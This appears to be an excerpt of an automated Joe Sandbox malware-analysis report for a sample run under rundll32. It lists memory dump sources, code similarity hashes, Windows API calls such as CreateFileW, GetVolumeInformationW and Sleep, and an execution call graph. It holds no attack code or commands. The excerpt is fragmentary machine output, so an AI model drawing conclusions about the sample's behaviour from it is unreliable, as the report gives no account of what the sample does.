                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesErrorFileLast
                          • String ID:
                          • API String ID: 1799206407-0
                          • Opcode ID: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                          • Instruction ID: c5a4fe3489037ea804c00f5422208fa66f2308ca377aeb35cea8b5e0c8ade501
                          • Opcode Fuzzy Hash: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                          • Instruction Fuzzy Hash: 39117AB120410320EE28693756243BB09024F8D3F8F2AB627EE6A873E4C63CC4469E1D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLastError.KERNEL32 ref: 005115CB
                            • Part of subcall function 00436300: CreateFileW.KERNEL32 ref: 00436369
                          • GetLastError.KERNEL32 ref: 00511666
                            • Part of subcall function 0043EA00: FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                            • Part of subcall function 0043EA00: LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorLast$CreateFileFormatFreeLocalMessage
                          • String ID: XLM$5B
                          • API String ID: 3390516113-4037079664
                          • Opcode ID: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                          • Instruction ID: 9b238616e6485af7c83a0d925af92c9e45f4d60ad68d559227fbd5342f7d0e30
                          • Opcode Fuzzy Hash: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                          • Instruction Fuzzy Hash: 05511522101BC488EB20EF76D8903D93B62F78579CF50421AEB5D4BB9ADF74C688C385
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetThreadUILanguage.KERNEL32 ref: 004145B9
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 00414634
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 004146A0
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 004146E0
                            • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 00414565
                            • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 0041458E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Thread$LanguagesPreferred$Language
                          • String ID:
                          • API String ID: 2255706666-0
                          • Opcode ID: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                          • Instruction ID: 57eada3b38194d7b08bb3a3721538a05868af864e37c8cd442cfa6c9d7bf3455
                          • Opcode Fuzzy Hash: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                          • Instruction Fuzzy Hash: 0F31B0723015609ADB58DF36DA543EA2762EB84BDCF446126FA0A47B58EF7CC8C5C344
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                          • GetVolumeInformationW.KERNEL32 ref: 0043657C
                          • GetDriveTypeW.KERNEL32 ref: 004365D7
                            • Part of subcall function 00436880: GetFileAttributesW.KERNEL32 ref: 0043689F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesFile$DriveInformationTypeVolume
                          • String ID: 8dC
                          • API String ID: 2660071179-998101939
                          • Opcode ID: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                          • Instruction ID: 486f2d80f4d3eed2484e1266edd3e8425bc97c3940d013daab9ec3d1af7560df
                          • Opcode Fuzzy Hash: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                          • Instruction Fuzzy Hash: 2F519F72205A81DDDB20DF36D8923E92B65F74578CF549026EE8987B5ACF3EC248C358
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Info
                          • String ID: p.B
                          • API String ID: 1807457897-946182354
                          • Opcode ID: 22a003e79e028586990879ec0448b419a07bf0a70b4757dbf8ddc0b5b453196e
                          • Instruction ID: a55d62deaf6486fe7fa7546ebbf7f25a2866b087c327a76bd6636ebfb1b793b4
                          • Opcode Fuzzy Hash: 22a003e79e028586990879ec0448b419a07bf0a70b4757dbf8ddc0b5b453196e
                          • Instruction Fuzzy Hash: 3721E476A14B80CEDB14DF39D89029C3BA4F38478CF64511AEA4987B69CF34C596C784
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:4.8%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1598
                          Total number of Limit Nodes:2
                          execution_graph 6473 815f10 6495 80c650 6473->6495 6477 815f64 6515 4111e0 6477->6515 6479 815f79 6480 81602c GetMessageW 6479->6480 6519 436960 6479->6519 6482 816041 6480->6482 6483 81601a 6480->6483 6543 40fec0 6482->6543 6483->6480 6484 815faa 6486 815fba Sleep 6484->6486 6488 436960 4 API calls 6486->6488 6489 815fd3 6488->6489 6489->6480 6490 815fd7 6489->6490 6527 80fc70 6490->6527 6547 40fde0 6495->6547 6497 80c667 6498 80c6ae 6497->6498 6551 411240 6497->6551 6500 4114b0 6498->6500 6501 4114e9 6500->6501 6502 4114cf 6500->6502 6501->6477 6503 4114eb 6502->6503 6504 4114dc 6502->6504 6506 411507 6503->6506 6507 40c4c0 TlsGetValue 6503->6507 6589 410430 6504->6589 6595 4106d0 6506->6595 6507->6506 6511 411538 6514 4106d0 TlsGetValue 6511->6514 6512 411521 6512->6511 6513 4106d0 TlsGetValue 6512->6513 6513->6511 6514->6501 6516 4111f4 6515->6516 6517 4100a0 TlsGetValue 6516->6517 6518 411202 6517->6518 6518->6479 6626 411140 6519->6626 6521 436973 GetFileAttributesW 6522 436989 6521->6522 6523 436a4e GetLastError 6521->6523 6524 4369a6 CreateFileW 6522->6524 6526 436993 6522->6526 6523->6526 6525 4369e1 CloseHandle 6524->6525 6524->6526 6525->6526 6526->6484 6528 80fc91 6527->6528 6628 80c6c0 6528->6628 6531 40fde0 TlsGetValue 6532 80fcd5 6531->6532 6533 815b40 6532->6533 6534 815b5e 6533->6534 6535 815b70 Sleep 6534->6535 6536 815b85 6535->6536 6537 410430 TlsGetValue 6536->6537 6538 815bc4 6537->6538 6860 80f6d0 6538->6860 6541 40fec0 TlsGetValue 6542 815c03 6541->6542 6542->6480 6544 40fee2 6543->6544 6545 40fecf 6543->6545 6545->6544 6546 40fde0 TlsGetValue 6545->6546 6546->6545 6548 40fdf0 6547->6548 6549 40fe19 6547->6549 6548->6549 6555 409120 6548->6555 6549->6497 6552 41124f 6551->6552 6570 4100a0 6552->6570 6556 40912a 6555->6556 6557 40912e 6555->6557 6556->6549 6557->6556 6559 4093f0 6557->6559 6562 409390 6559->6562 6561 409401 6561->6556 6563 4093a8 6562->6563 6565 4093bc 6563->6565 6566 419650 6563->6566 6565->6561 6567 419682 6566->6567 6568 41965d 6566->6568 6567->6565 6568->6567 6569 419672 TlsGetValue 6568->6569 6569->6567 6571 4100bf 6570->6571 6573 4100c6 6570->6573 6576 40fcb0 6571->6576 6574 40fde0 TlsGetValue 6573->6574 6575 4100f4 6574->6575 6575->6498 6577 40fcdc 6576->6577 6578 40fcbd 6576->6578 6577->6573 6579 40fcca 6578->6579 6586 40c4c0 6578->6586 6582 4090f0 6579->6582 6583 4090fa 6582->6583 6584 4090fe 6582->6584 6583->6577 6584->6583 6585 4093f0 TlsGetValue 6584->6585 6585->6583 6587 409390 TlsGetValue 6586->6587 6588 40c4d3 6587->6588 6588->6579 6590 41044b 6589->6590 6594 41045d 6589->6594 6593 40fcb0 TlsGetValue 6590->6593 6590->6594 6591 40fde0 TlsGetValue 6592 410498 6591->6592 6592->6501 6593->6594 6594->6591 6611 410610 6595->6611 6598 4113d0 6599 4113f3 6598->6599 6600 4113e6 6598->6600 6602 411451 6599->6602 6603 411401 6599->6603 6601 40fde0 TlsGetValue 6600->6601 6608 4113ee 6601->6608 6604 40fcb0 TlsGetValue 6602->6604 6605 411416 6603->6605 6606 40c4c0 TlsGetValue 6603->6606 6609 411458 6604->6609 6617 409150 6605->6617 6606->6605 6608->6512 6609->6608 6610 40fde0 TlsGetValue 6609->6610 6610->6608 6612 410662 6611->6612 6613 410625 6611->6613 6612->6598 6613->6612 6614 40fcb0 TlsGetValue 6613->6614 6615 41063a 6614->6615 6616 40fde0 TlsGetValue 6615->6616 6616->6612 6618 40915f 6617->6618 6622 409199 6617->6622 6619 409164 6618->6619 6620 40917e 6618->6620 6621 40917c 6619->6621 6625 4093f0 TlsGetValue 6619->6625 6620->6621 6623 4093f0 TlsGetValue 6620->6623 6621->6608 6622->6621 6624 4093f0 TlsGetValue 6622->6624 6623->6621 6624->6621 6625->6621 6627 41114c 6626->6627 6627->6521 6649 4346d0 